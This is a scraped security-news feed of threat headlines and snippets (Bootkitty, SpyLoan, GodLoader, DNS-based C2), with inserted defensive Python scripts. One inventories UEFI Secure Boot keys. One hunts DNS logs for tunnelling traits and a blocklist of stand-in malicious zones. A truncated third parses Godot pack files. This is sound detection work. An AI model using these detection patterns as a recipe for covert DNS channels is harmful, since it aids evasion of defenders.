## Detections/Hunting Queries ### Microsoft Defender Antivirus Microsoft Defender Antivirus detects threat components as the following malware: - [Backdoor:Linux/Gafgyt](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Gafgyt) - [Trojan:Linux/Gafgyt](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name 2024-12-03T20:54:13+00:00 https://community.riskiq.com/article/a74e939f www.secnews.physaphae.fr/article.php?IdArticle=8619090 False Malware,Threat,Prediction None 2.0000000000000000 Dark Reading - Informationweek Branch Decade-Old Cisco Vulnerability Under Active Exploit Cisco encourages users to update to an unaffected version of its Adaptive Security Appliance (ASA) software since there are no workarounds for the 2014 vulnerability. 2024-12-03T20:25:34+00:00 https://www.darkreading.com/vulnerabilities-threats/decade-old-cisco-vulnerability-exploit www.secnews.physaphae.fr/article.php?IdArticle=8619067 False Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) New "CleverSoar" Installer Targets Chinese and Vietnamese Users 2024-12-03T17:19:43+00:00 https://community.riskiq.com/article/b24308b0 www.secnews.physaphae.fr/article.php?IdArticle=8619033 False Malware,Tool,Threat None 2.0000000000000000 Dark Reading - Informationweek Branch Venom Spider Spins Web of New Malware for MaaS Platform A novel backdoor malware and a loader that customizes payload names for each victim have been added to the threat group's cybercriminal tool set. 2024-12-03T16:19:13+00:00 https://www.darkreading.com/cyberattacks-data-breaches/venom-spider-malware-maas-platform www.secnews.physaphae.fr/article.php?IdArticle=8619008 False Malware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks The North Korea-aligned threat actor known as Kimsuky has been linked to a series of phishing attacks that involve sending email messages that originate from Russian sender addresses to ultimately conduct credential theft. "Phishing emails were sent mainly through email services in Japan and Korea until early September," South Korean cybersecurity company Genians said. "Then, from mid-September, 2024-12-03T15:21:00+00:00 https://thehackernews.com/2024/12/north-korean-kimsuky-hackers-use.html www.secnews.physaphae.fr/article.php?IdArticle=8618916 False Threat None 2.0000000000000000 Global Security Mag - French news site Keeper Introduces Risk Management Dashboard Product Reviews
Keeper Introduces Risk Management Dashboard for Enhanced Risk Visibility and Proactive Threat Mitigation. The dashboard offers administrators visibility into organizational security practices and compliance posture, supported by dynamic benchmarks and real-time risk assessments. - Product Reviews
2024-12-03T14:58:53+00:00 https://www.globalsecuritymag.fr/keeper-introduces-risk-management-dashboard.html www.secnews.physaphae.fr/article.php?IdArticle=8618972 False Threat None 2.0000000000000000
ProofPoint - Cyber Firms The Rise of MMS Scams: A Picture Is Worth a 1,000 Words, and Sometimes That's Not Good 2024-12-03T12:31:21+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/growing-threat-mms-scam-messages www.secnews.physaphae.fr/article.php?IdArticle=8618952 False Spam,Threat,Mobile,Commercial FedEx 2.0000000000000000 Sekoia - Cyber Firms Blocklist in Sekoia On a calm Friday afternoon, rumors of a new active threat start hitting the various social network websites. Your CSIRT team starts checking the private channels it has with other CERTs and compiling a list of Indicators of Compromise (IoCs). After careful consideration, they decide to block all communications with these IoCs on the […] The post Blocklist in Sekoia is an article from the Sekoia.io Blog.
2024-12-03T10:00:00+00:00 https://blog.sekoia.io/blocklist-in-sekoia/ www.secnews.physaphae.fr/article.php?IdArticle=8618927 False Threat None 2.0000000000000000
InfoSecurity Mag - InfoSecurity Magazine Chinese LIDAR Dominance a Cybersecurity Threat, Warns Think Tank The Foundation for Defense of Democracies has warned that Chinese-made LIDAR sensors could be weaponized for espionage 2024-12-03T09:45:00+00:00 https://www.infosecurity-magazine.com/news/chinese-lidar-dominance/ www.secnews.physaphae.fr/article.php?IdArticle=8618923 False Threat None 2.0000000000000000 Global Security Mag - French news site Getronics extends its partnership with Exabeam Business
Getronics invests 1 million euros to improve security operations for its international customers with Exabeam. Getronics will build on Exabeam's LogRhythm SIEM platform to offer full log contextualization, improved threat detection and a user-centric interface. - Business
2024-12-03T07:54:04+00:00 https://www.globalsecuritymag.fr/getronics-etend-son-partenariat-avec-exabeam.html www.secnews.physaphae.fr/article.php?IdArticle=8618902 False Threat None 2.0000000000000000
AlienVault Lab Blog - AlienVault is a major defensive player in IOCs Best Ways to Reduce Your Digital Footprint Now According to a study, seven out of ten employers run an employee background check on social media platforms and have rejected 57% of people 2024-12-03T07:00:00+00:00 https://levelblue.com/blogs/security-essentials/best-ways-to-reduce-your-digital-footprint-now www.secnews.physaphae.fr/article.php?IdArticle=8618898 False Spam,Tool,Threat,Studies,Medical Yahoo 2.0000000000000000 ProofPoint - Cyber Firms How to Secure Your Amazon SES Email with Proofpoint Secure Email Relay Traditionally, on-premises SMTP relays were the means by which messaging and security teams controlled email sending from on-premises applications on behalf of their organizations' domains. With this control, it was relatively straightforward to protect against brand damage and the loss of sensitive data. It also helped to protect recipients from fraud. However, as applications modernize and move to the cloud, email sending has changed. Today, it's often outsourced to services that are offered by cloud service providers or third parties. This means 2024-12-03T06:27:33+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/how-secure-your-amazon-ses-email-proofpoint-secure-email-relay www.secnews.physaphae.fr/article.php?IdArticle=8619005 False Spam,Malware,Threat,Cloud None 2.0000000000000000 HackRead - Chercher Cyber How Attackers Use Corrupted Files to Slip Past Security New zero-day attack bypasses antivirus, sandboxes, and spam filters using corrupted files.
Learn how ANY.RUN's sandbox detects and… 2024-12-03T01:03:36+00:00 https://hackread.com/how-attackers-use-corrupted-files-slip-past-security/ www.secnews.physaphae.fr/article.php?IdArticle=8618856 False Spam,Vulnerability,Threat None 2.0000000000000000 TrendLabs Security - Antivirus vendor Gafgyt Malware Targeting Docker Remote API Servers Our researchers identified threat actors exploiting misconfigured Docker servers to spread the Gafgyt malware. This threat traditionally targets IoT devices; this new tactic signals a change in its behavior. 2024-12-03T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/l/gafgyt-malware-targeting-docker-remote-api-servers.html www.secnews.physaphae.fr/article.php?IdArticle=8618906 False Malware,Threat None 2.0000000000000000 Recorded Future - Recorded Future feed Report: Chinese lidar technology poses national security threat Lidar, now used globally in a wide variety of civilian and military use cases, “stands at the center of Beijing's bid for technological superiority,” the report says, warning that Chinese companies are taking control of the global lidar market. 2024-12-02T22:02:30+00:00 https://therecord.media/china-lidar-national-security-threat-report www.secnews.physaphae.fr/article.php?IdArticle=8618822 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Bootkitty: Analyzing the first UEFI bootkit for Linux ## Snapshot ESET researchers have identified Bootkitty, a UEFI bootkit that targets Linux systems, specifically a few Ubuntu versions. However, Bootkitty appears to be more of a proof of concept than actively used malware, as it supports only a limited number of systems due to hardcoded byte patterns and lacks kernel-version checks. The bootkit modifies kernel version strings and alters the first environment variable of the init process to preload potentially malicious shared objects.
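A check to pair with the Bootkitty entry: the bootkit is signed with a self-signed certificate, so on a machine with Secure Boot enabled it only runs if that certificate was enrolled in a signature database. The script below, an added example rather than ESET's or RiskIQ's code, reads the SecureBoot flag and walks the enrolled certificates and hashes so an owner GUID or X.509 blob you cannot account for stands out. Parsing follows the EFI_SIGNATURE_LIST layout from the UEFI specification; the database blob at the bottom is constructed so the script runs without firmware access, and its "vendor" and "rogue" owner GUIDs are made up.

```python
"""Inventory UEFI Secure Boot state on Linux: the SecureBoot flag plus every
entry in a db-style signature database (db, dbx, shim's MokList all share the
EFI_SIGNATURE_LIST layout).  Added example; sample data is constructed."""
import struct
import uuid
from pathlib import Path
from typing import Optional

EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
EFI_GLOBAL_VARIABLE_GUID = "8be4df61-93ca-11d2-aa0d-00e098032b8c"         # SecureBoot lives here
EFI_IMAGE_SECURITY_DATABASE_GUID = "d719b2cb-3d3a-4596-a3bc-dad00e67656f"  # db / dbx live here
EFIVARS = Path("/sys/firmware/efi/efivars")
TYPE_NAMES = {EFI_CERT_X509_GUID: "x509", EFI_CERT_SHA256_GUID: "sha256"}


def parse_signature_lists(blob: bytes):
    """Yield (type, owner_guid, data) for each signature in a chain of EFI_SIGNATURE_LISTs.

    Per list: SignatureType GUID(16) | SignatureListSize u32 | SignatureHeaderSize u32
    | SignatureSize u32 | header bytes | N x (SignatureOwner GUID(16) + SignatureData).
    """
    off = 0
    while off + 28 <= len(blob):
        sig_type = uuid.UUID(bytes_le=blob[off:off + 16])
        list_size, hdr_size, sig_size = struct.unpack_from("<III", blob, off + 16)
        end = off + list_size
        if list_size < 28 + hdr_size or end > len(blob) or sig_size < 16:
            raise ValueError(f"malformed EFI_SIGNATURE_LIST at offset {off}")
        kind = TYPE_NAMES.get(sig_type, str(sig_type))
        pos = off + 28 + hdr_size
        while pos + sig_size <= end:
            owner = uuid.UUID(bytes_le=blob[pos:pos + 16])
            yield kind, owner, blob[pos + 16:pos + sig_size]
            pos += sig_size
        off = end


def read_efivar(name: str, guid: str) -> Optional[bytes]:
    """Read a UEFI variable via efivarfs, dropping the 4-byte attribute prefix efivarfs prepends."""
    try:
        return (EFIVARS / f"{name}-{guid}").read_bytes()[4:]
    except OSError:          # no EFI firmware, no efivarfs, or no permission
        return None


def secure_boot_enabled() -> Optional[bool]:
    data = read_efivar("SecureBoot", EFI_GLOBAL_VARIABLE_GUID)
    return None if data is None else data[:1] == b"\x01"


def summarize(blob: bytes, expected_owners=()):
    """One dict per enrolled signature; 'unexpected' marks owners outside expected_owners."""
    expected = {uuid.UUID(str(o)) for o in expected_owners}
    return [{"type": kind, "owner": str(owner), "size": len(data),
             "unexpected": bool(expected) and owner not in expected}
            for kind, owner, data in parse_signature_lists(blob)]


def build_signature_list(sig_type: uuid.UUID, entries) -> bytes:
    """Build one EFI_SIGNATURE_LIST for test data; entries are (owner, data) with equal-length data."""
    sig_size = 16 + len(entries[0][1])
    body = b"".join(owner.bytes_le + data for owner, data in entries)
    return sig_type.bytes_le + struct.pack("<III", 28 + len(body), 0, sig_size) + body


VENDOR_OWNER = uuid.UUID("11111111-2222-4333-8444-555555555555")  # constructed
ROGUE_OWNER = uuid.UUID("00000000-0000-4000-8000-00000000bad0")   # constructed
SAMPLE_DB = (
    build_signature_list(EFI_CERT_X509_GUID, [(VENDOR_OWNER, b"\x30\x82" + b"A" * 40)])
    + build_signature_list(EFI_CERT_SHA256_GUID, [(VENDOR_OWNER, bytes(range(32)))])
    + build_signature_list(EFI_CERT_X509_GUID, [(ROGUE_OWNER, b"\x30\x82" + b"B" * 40)])
)

if __name__ == "__main__":
    print("SecureBoot enabled:", secure_boot_enabled())
    live_db = read_efivar("db", EFI_IMAGE_SECURITY_DATABASE_GUID)
    for row in summarize(live_db if live_db is not None else SAMPLE_DB, [VENDOR_OWNER]):
        print(row)
```

On a real host, feed the X.509 blobs to an ASN.1 parser to read subject names, and run the same walk over dbx and the MokList variables; a SecureBoot value of 0, or None on a BIOS-mode machine, means the bootkit's certificate check is irrelevant because nothing is verifying the chain at all.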
## Description Bootkitty is designed to subvert the UEFI Secure Boot chain of trust by modifying the boot process, including the GRUB bootloader and the Linux kernel's EFI stub loader. It disables the kernel's signature verification feature, allowing it to preload two unknown ELF binaries via the Linux init process. The bootkit patches the decompressed Linux kernel image in memory, which could lead to system crashes if it patches incorrect code or data. It is signed with a self-signed certificate, which means it cannot run on systems with UEFI Secure Boot enabled unless the attacker's certificates have been installed. 2024-12-02T20:51:57+00:00 https://community.riskiq.com/article/27fd0302 www.secnews.physaphae.fr/article.php?IdArticle=8618815 False Malware,Threat None 2.0000000000000000 Techworm - News SpyLoan Malware Hits 8 Million Android Users wrote in a blog post published last week. According to the security software company, the 15 SpyLoan apps operate using a shared framework designed to encrypt and exfiltrate sensitive data from a victim's device to a command and control (C2) server, indicating that the same developer or group of cybercriminals is behind all of them. SpyLoan apps masquerade as legitimate loan providers under deceptive names and logos, creating a false sense of trust. These apps pose as genuine loan services, promising instant credit with minimal requirements to unsuspecting users in Mexico, Colombia, Senegal, Thailand, Indonesia, Vietnam, Tanzania, Peru, and Chile. Once a user registers for the service, these apps use a one-time password (OTP) to ensure they have a phone number from the targeted region. The users are then prompted to provide supplementary identification documents and personal information, banking accounts, employee information, and device data that are subsequently exfiltrated from the victims to the C2 server in an encrypted format.
However, these apps secretly collect sensitive data, including contacts, call logs, and SMS messages, under the pretense of processing loans. They also employ aggressive tactics, such as demanding additional mobile app permissions and intimidating users with threatening messages or calls, including death threats. Once the loan is disbursed, users often find themselves trapped in high-interest repayment schemes. The operators misuse the stolen phone data to harass and blackmail borrowers, often contacting family members to pressure repayment. According to McAfee Labs, malicious SpyLoan apps and unique infected devices have increased by over 75% from the end of Q2 to the end of Q3 2024. 5 of these apps are still available for download on the official app store, as they have reportedly made adjustments to align with Google Play policies. To mitigate the risks posed by such apps, it is advisable to read app permissions carefully, read app reviews to see if any issues have been reported, avoid downloading apps from third-party marketplaces, check the legitimacy of the application publisher before downloading them, and install and update security software. “The threat of Android apps like SpyLoan is a global issue that exploits users’ trust and financial desperation. Despite law enforcement actions to capture multiple groups linked to the operation of SpyLoan apps, new operators and cybercriminals continue to exploit these fraud activities,” Ruiz said. “SpyLoan apps operate with similar code at app and C2 level across different continents. This suggests the presence of a common developer or a shared framework that is being sold to cybercriminals. This modular approach allows these developers to quickly distribute malicious apps tailored to various markets, exploiting local vulnerabilities while maintaining a consistent model for scamming users.”
Security researcher
2024-12-02T20:25:02+00:00 https://www.techworm.net/2024/12/spyloan-malware-million-android.html www.secnews.physaphae.fr/article.php?IdArticle=8630525 False Malware,Vulnerability,Threat,Legislation,Mobile None 2.0000000000000000
RiskIQ - cyber risk firms (now microsoft) "Operation Undercut" Shows Multifaceted Nature of SDA's Influence Operations #### Targeted Geolocations - Western Europe - Eastern Europe - North America ## Snapshot Recorded Future's Insikt Group has uncovered Operation Undercut, a covert influence campaign orchestrated by Russia's Social Design Agency (SDA) aimed at undermining Western support for Ukraine and sowing discord within Western societies. Employing AI-enhanced videos and impersonating reputable news outlets, the operation spreads disinformation to target audiences in the US, Europe, and Ukraine, while also addressing geopolitical issues like the Is 2024-12-02T19:56:32+00:00 https://community.riskiq.com/article/ca4c0b91 www.secnews.physaphae.fr/article.php?IdArticle=8618804 False Threat,Prediction None 2.0000000000000000 Global Security Mag - French news site Filigran upgrades its OpenCTI platform Products
OpenCTI from Filigran, the European cybertech, gains new capabilities to help organizations better fight cyber threats - Products
2024-12-02T13:47:24+00:00 https://www.globalsecuritymag.fr/filigran-fait-evoluer-sa-plateforme-opencti.html www.secnews.physaphae.fr/article.php?IdArticle=8618674 False Threat None 2.0000000000000000
RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 2 December 2024 2024-12-02T12:13:17+00:00 https://community.riskiq.com/article/3c8b5d6b www.secnews.physaphae.fr/article.php?IdArticle=8618668 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Medical None 2.0000000000000000 Checkpoint Research - Security hardware vendor 2nd December – Threat Intelligence Report For the latest discoveries in cyber research for the week of 2nd December, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Supply chain software provider Blue Yonder was hit by a ransomware attack, disrupting services for clients like Starbucks and UK grocery chains Morrisons and Sainsbury’s. The incident affected operations such as employee […]
2024-12-02T11:55:22+00:00 https://research.checkpoint.com/2024/2nd-december-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8618641 False Ransomware,Threat None 2.0000000000000000
The State of Security - American magazine Diversity Can Be a Powerful Tool in Combating Increasing Cybersecurity Threats The issue of diversity in the cybersecurity sector has been present since the early days of IT companies. The public perception of a cybersecurity professional carries with it a specific image of the kind of person who works in IT and cybersecurity, and many minority groups, including women, people of color and ethnic minorities, and disabled and neurodivergent people, are heavily underrepresented in the workforce. Diversity in the cyber workforce is more than just a social issue. Fighting cybersecurity risks is difficult, especially as the threat landscape is constantly evolving and shifting... 2024-12-02T04:36:20+00:00 https://www.tripwire.com/state-of-security/diversity-can-be-powerful-tool-combating-increasing-cybersecurity-threats www.secnews.physaphae.fr/article.php?IdArticle=8618625 False Tool,Threat None 2.0000000000000000 The State of Security - American magazine Cyber-Safe Shopping: Protect Yourself from Holiday Scams and Cyber Threats The holiday shopping season is here, and while it brings excitement and joy, it also opens opportunities for cybercriminals to exploit unsuspecting shoppers. With more people buying gifts online and taking advantage of holiday deals, the risk of falling victim to cyberattacks increases. Whether you're shopping from your desktop, mobile device, or in-store, it's essential to be aware of common threats and take steps to protect yourself.
Here's a guide on how to stay safe while you enjoy the holiday shopping season: Beware of Phishing Scams Phishing scams are one of the most common ways to steal... 2024-12-02T04:17:51+00:00 https://www.tripwire.com/state-of-security/cyber-safe-shopping-protect-yourself-holiday-scams-and-cyber-threats www.secnews.physaphae.fr/article.php?IdArticle=8618627 False Threat,Mobile None 2.0000000000000000 RedTeam PL - DarkTrace: AI bases detection DNS based threat hunting and DoH (DNS over HTTPS) https://tools.ietf.org/html/rfc8484]) can help a lot in hiding communication with C&C (a.k.a. C2). What is new in this case, and changes a lot, is that well-known and trusted vendors such as Google, Cloudflare and others are starting to run their own DoH services. This new feature can be used by red teamers as well as abused by threat actors such as attackers, malware creators and so on. A few words about the current common approach to detection: one of the general approaches used in threat hunting is detection of malicious communication based on DNS traffic. When an attacker communicates with the C&C using old-style methods such as HTTP(S), it is quite easy to discover such communication if an organisation has anything able to detect such an attack, like a DNS firewall (e.g. OpenDNS Family Shield [https://signup.opendns.com/familyshield/]) and/or traffic inspection using a SIEM, because common detection tools use blacklists of malicious domains. When security researchers use honeypots, perform malware analysis and so on, or targeted companies report malicious domains, other organisations can collect these artifacts, such as domains, and use them for detection and/or blocking (e.g. a DNS blackhole). As described in The Pyramid of Pain [http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html], this is one of the simplest mechanisms for threat hunting.
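DNS-log hunting in the spirit of the blocklist approach just described, extended (as an added example, not the blog's own code) with two heuristics a domain blocklist cannot give you: record types that end hosts rarely ask for (TXT, ANY, AXFR) and high-entropy leftmost labels typical of data encoded into query names. The log lines, blocklist and thresholds are constructed for illustration; the "ts client qname qtype" layout is a simplified stand-in for a real resolver or sensor log. The limit the article points at is built in: queries sent over DoH never reach a DNS log, so the only DNS-side trace is the client resolving the DoH front end's own hostname, which the script flags.

```python
"""Hunt a DNS query log for blocklisted zones, repeated rare query types,
high-entropy labels and lookups of DoH resolver hostnames.  Added example;
log format, blocklist and thresholds are constructed for illustration."""
import math
from collections import Counter, defaultdict

BLOCKLIST = {"evil-update.example", "cdn-metrics.example"}          # constructed
RARE_QTYPES = {"TXT", "ANY", "AXFR", "NULL"}
DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "mozilla.cloudflare-dns.com"}


def shannon_entropy(s: str) -> float:
    """Bits per character; 16 distinct characters in 16 positions give 4.0."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registrable(qname: str) -> str:
    """Crude eTLD+1 (last two labels); wrong for co.uk-style suffixes, fine for a demo."""
    return ".".join(qname.split(".")[-2:])


def parse_line(line: str) -> dict:
    ts, client, qname, qtype = line.split()
    return {"ts": ts, "client": client, "qname": qname.lower().rstrip("."), "qtype": qtype.upper()}


def hunt(lines, rare_threshold=3, entropy_threshold=3.5, min_label_len=16):
    """Return (client, zone, reason) tuples, each reported once per client and zone."""
    findings, seen = [], set()
    rare_counts = defaultdict(int)

    def flag(client, zone, reason):
        key = (client, zone, reason)
        if key not in seen:
            seen.add(key)
            findings.append(key)

    for rec in map(parse_line, lines):
        client, qname, zone = rec["client"], rec["qname"], registrable(rec["qname"])
        if zone in BLOCKLIST:
            flag(client, zone, "blocklisted")
        if qname in DOH_HOSTS:
            flag(client, qname, "doh-resolver-lookup")
        if rec["qtype"] in RARE_QTYPES:
            rare_counts[(client, zone)] += 1
            if rare_counts[(client, zone)] >= rare_threshold:
                flag(client, zone, "repeated rare query types")
        # Entropy of the leftmost label only: that is where encoded data lives.
        label = qname.split(".")[0]
        if len(label) >= min_label_len and shannon_entropy(label) > entropy_threshold:
            flag(client, zone, "high-entropy label")
    return findings


# Constructed sample log: two benign clients, one talking to a blocklisted
# zone over TXT, one with an encoded label, one resolving a DoH front end.
SAMPLE_LOG = """\
2024-12-01T10:00:01 10.1.2.3 www.example.org A
2024-12-01T10:00:02 10.1.2.3 mail.example.org MX
2024-12-01T10:00:05 10.1.2.9 evil-update.example A
2024-12-01T10:00:07 10.1.2.9 c1.evil-update.example TXT
2024-12-01T10:00:09 10.1.2.9 c2.evil-update.example TXT
2024-12-01T10:00:11 10.1.2.9 c3.evil-update.example TXT
2024-12-01T10:00:15 10.1.2.4 q7w3e9r1t5y2u8i4.tunnel-host.example A
2024-12-01T10:00:20 10.1.2.4 dns.google A
""".splitlines()

if __name__ == "__main__":
    for client, zone, reason in hunt(SAMPLE_LOG):
        print(f"{client:10} {zone:25} {reason}")
```

Tune the thresholds against your own baseline before alerting: CDNs and anti-spam services legitimately produce long labels and TXT lookups, so the rare-type and entropy rules are triage leads, not verdicts, while the DoH-hostname hit is the cue to look at the client's TLS traffic instead of its DNS.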
Another common way for malicious communication is to perform communication with C&C only over DNS queries, and that way malware can communicate with C&C using for example TXT, AXFR or ANY DNS records, but not only these, as it all depends on creativity. Quoting Cisco Talos Intelligence Group [https://blog.talosintelligence.com/2017/03/dnsmessenger.html]: “Typically this use of DNS is related to the exfiltration of information. Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT.”, but in fact, this is not extremely uncommon [https://attack.mitre.org/techniques/T1071/] 2024-12-01T16:28:12+00:00 https://blog.redteam.pl/2019/04/dns-based-threat-hunting-and-doh.html www.secnews.physaphae.fr/article.php?IdArticle=8618480 False Malware,Tool,Threat None 3.0000000000000000 RedTeam PL - DarkTrace: AI bases detection BadWPAD wpad.software case and DNS threat hunting https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html].
WPAD TLDs

First of all we checked the TLD list from IANA [https://data.iana.org/TLD/tlds-alpha-by-domain.txt] for the first level of wpad domains:

101.37.23.113 wpad.bike
104.18.54.241 wpad.mobi
104.18.55.241 wpad.mobi
104.199.123.6 wpad.ac
104.24.104.177 wpad.online
104.24.104.228 wpad.army
104.24.105.177 wpad.online
104.24.105.228 wpad.army
104.24.120.45 wpad.space
104.24.121.45 wpad.space
104.25.51.128 wpad.world
104.27.176.234 wpad.site
104.27.177.234 wpad.site
104.27.188.57 wpad.co
104.27.189.57 wpad.co
104.28.10.19 wpad.kz
104.28.11.19 wpad.kz
104.31.74.75 wpad.exchange

2024-12-01T15:56:58+00:00 https://blog.redteam.pl/2019/05/wpad-software-case-dns-threat-hunting.html www.secnews.physaphae.fr/article.php?IdArticle=8618460 False Malware,Threat APT 32 2.0000000000000000 RedTeam PL - DarkTrace: AI bases detection BadWPAD, DNS suffix and wpad.pl / wpadblocking.com case 2024-12-01T15:51:25+00:00 https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html www.secnews.physaphae.fr/article.php?IdArticle=8618461 False Threat,Mobile None 3.0000000000000000 Kaspersky - Kaspersky Research blog IT threat evolution in Q3 2024. Non-mobile statistics The non-mobile threat report for Q3 2024 contains data on ransomware, miners, and macOS and IoT threats. 2024-11-29T10:00:59+00:00 https://securelist.com/malware-report-q3-2024-non-mobile-statistics/114695/ www.secnews.physaphae.fr/article.php?IdArticle=8618233 False Ransomware,Threat None 2.0000000000000000 Kaspersky - Kaspersky Research blog IT threat evolution in Q3 2024.
Mobile statistics The Q3 2024 mobile threat statistics encompass data on cyberattacks against Android devices involving malware, adware and potentially unwanted apps. 2024-11-29T10:00:38+00:00 https://securelist.com/malware-report-q3-2024-mobile-statistics/114692/ www.secnews.physaphae.fr/article.php?IdArticle=8618234 False Malware,Threat,Mobile None 2.0000000000000000 Kaspersky - Kaspersky Research blog IT threat evolution Q3 2024 In this part of the malware report we discuss the most remarkable findings of Q3 2024, including APT and hacktivist attacks, ransomware, stealers, macOS malware and so on. 2024-11-29T10:00:33+00:00 https://securelist.com/malware-report-q3-2024/114678/ www.secnews.physaphae.fr/article.php?IdArticle=8618235 False Ransomware,Malware,Threat None 3.0000000000000000 Global Security Mag - French news site ESET announces a new partnership with Filigran Business
ESET enriches the OpenCTI ecosystem with its Cyber Threat Intelligence feeds. ESET and Filigran announce the integration of ESET's CTI feeds into the OpenCTI platform. Native availability of ESET Threat Intelligence in OpenCTI makes analysis more efficient for cybersecurity teams. Working together on a deep integration, data exchanges are optimized and threat response is accelerated. The shared goal is to significantly reduce incident handling time. - Business
2024-11-29T08:51:03+00:00 https://www.globalsecuritymag.fr/eset-annonce-un-nouveau-partenariat-avec-filigran.html www.secnews.physaphae.fr/article.php?IdArticle=8618220 False Threat None 2.0000000000000000
InformationSecurityBuzzNews - Security news site Shop Smart, Stay Safe: Black Friday Edition As Black Friday approaches, shoppers eagerly hunt for bargains online, but so do malicious actors. Cyber criminals are like pick-pockets: they go where the crowds are, so this high-traffic shopping season presents a smorgasbord of opportunities for malefactors to exploit vulnerabilities, from phishing scams to fake retail websites. With digital transactions expected to skyrocket, staying [...] 2024-11-29T06:15:07+00:00 https://informationsecuritybuzz.com/shop-smart-black-friday-edition/ www.secnews.physaphae.fr/article.php?IdArticle=8618215 False Vulnerability,Threat None 1.00000000000000000000 InformationSecurityBuzzNews - Security news site Godot Gaming Engine Exploited to Spread Undetectable Malware Check Point Research has discovered that cybercriminals are exploiting the popular Godot Engine to spread malware, bypassing detection by nearly all antivirus solutions. The new technique uses Godot’s scripting language, GDScript, to deliver malicious payloads through a loader dubbed “GodLoader,” which has infected over 17,000 devices since June 2024. New Threat Vector in Gaming Development [...] 2024-11-29T06:01:28+00:00 https://informationsecuritybuzz.com/godot-gaming-engine-exploited-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8618210 False Malware,Threat None 2.0000000000000000 InformationSecurityBuzzNews - Security news site Phishing Attacks Dominate Threat Landscape in Q3 2024 Spearphishing attacks with links and attachments increased in Q3 2024, accounting for 46% of security incidents, ReliaQuest's Top Cyber Attacker Techniques report has revealed. Initial access methods like spear phishing were the most common MITRE ATT&CK techniques last quarter and have remained so in Q3 2024.
According to ReliaQuest, high employee turnover and the accessibility of [...] 2024-11-29T05:52:31+00:00 https://informationsecuritybuzz.com/phishing-attacks-dominate-threat-lands/ www.secnews.physaphae.fr/article.php?IdArticle=8618211 False Threat None 3.0000000000000000 Techworm - News Hackers Exploit Popular Godot Game Engine To Spread Malware Gaming Engines: An Undetected Playground for Malware Loaders,” the researchers say they believe that the threat actor behind the GodLoader malware has been using it since June 29, 2024, and has infected more than 17,000 devices so far. Notably, these payloads included cryptocurrency miners like XMRig, which was hosted on a private Pastebin file uploaded on May 10, 2024. The file contained the XMRig configuration related to the campaign, and had been visited 206,913 times. The malware is distributed via the Stargazers Ghost Network, which operates as a Distribution-as-a-Service (DaaS) model, giving malware a seemingly legitimate distribution channel through GitHub repositories. Approximately 200 repositories and more than 225 Stargazer Ghost accounts were used to distribute GodLoader throughout September and October. The attacks, targeting developers, gamers, and general users, were carried out in four waves via GitHub repositories on September 12, September 14, September 29, and October 3, 2024, tempting victims to download infected tools and games. “Godot uses .pck (pack) files to bundle game assets and resources, such as scripts, scenes, textures, sounds, and other data. The game can load these files dynamically, allowing developers to distribute updates, downloadable content (DLC), or additional game assets without modifying the core game executable,” Check Point researchers said in the report. “These pack files might contain elements related to the games, images, audio files, and any other “static” files. In addition to these static files, .pck files can include scripts written in GDScript (.gd).
These scripts can be executed when the .pck is loaded using the built-in callback function _ready(), allowing the game to add new functionality or modify existing behavior. “This feature gives attackers many possibilities, from downloading additional malware to executing remote payloads, all while remaining undetected. Since GDScript is a fully functional language, threat actors have many functions like anti-sandbox, anti-virtual machine measures, and remote payload execution, enabling the malware to remain undetected.” While the researchers only identified GodLoader samples specifically targeting Windows systems, they also developed a proof-of-concept exploit using GDScript, demonstrating how easily the malware could be adapted to target Linux and macOS systems. To reduce the risks posed by threats like GodLoader, it is crucial to keep operating systems and applications updated with timely patches and exercise caution with unexpe 2024-11-28T16:02:54+00:00 https://www.techworm.net/2024/11/hacker-exploit-godot-game-engine-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8630526 False Malware,Tool,Vulnerability,Threat,Mobile,Technical None 2.0000000000000000 IndustrialCyber - cyber risk firms for industrial Australia's Cyber Defense report highlights evolving threats and strategic countermeasures The Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) recently published the 2023–24 Annual Cyber Threat Report...
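Following the Techworm Godot entry above: a .pck is a directory of bundled files, and the GDScript sources it carries are what run at _ready(). The script below is an added example (not Check Point's tooling) that enumerates a pack's contents and flags the scripts in it, so a dropped pack can be triaged without loading it in the engine. It implements pack format version 1 as written by Godot 3.x: magic "GDPC", format version, three engine-version words, 16 reserved words, a file count, then one directory entry per file (padded path, absolute offset, size, MD5). Godot 4 writes format version 2 with additional fields, which this parser rejects rather than misreads, and a pack appended to an executable would need its offset located first. The pack at the bottom is built in memory, and the "suspicious" API list is a starting heuristic of my own, not a signature.

```python
"""Enumerate a Godot 3.x (format v1) .pck and flag bundled GDScript sources.
Added example; the sample pack and the API heuristic are constructed."""
import hashlib
import struct

PCK_MAGIC = 0x43504447  # "GDPC" read as a little-endian u32
# GDScript calls a loader would need; presence alone is a lead, not a verdict.
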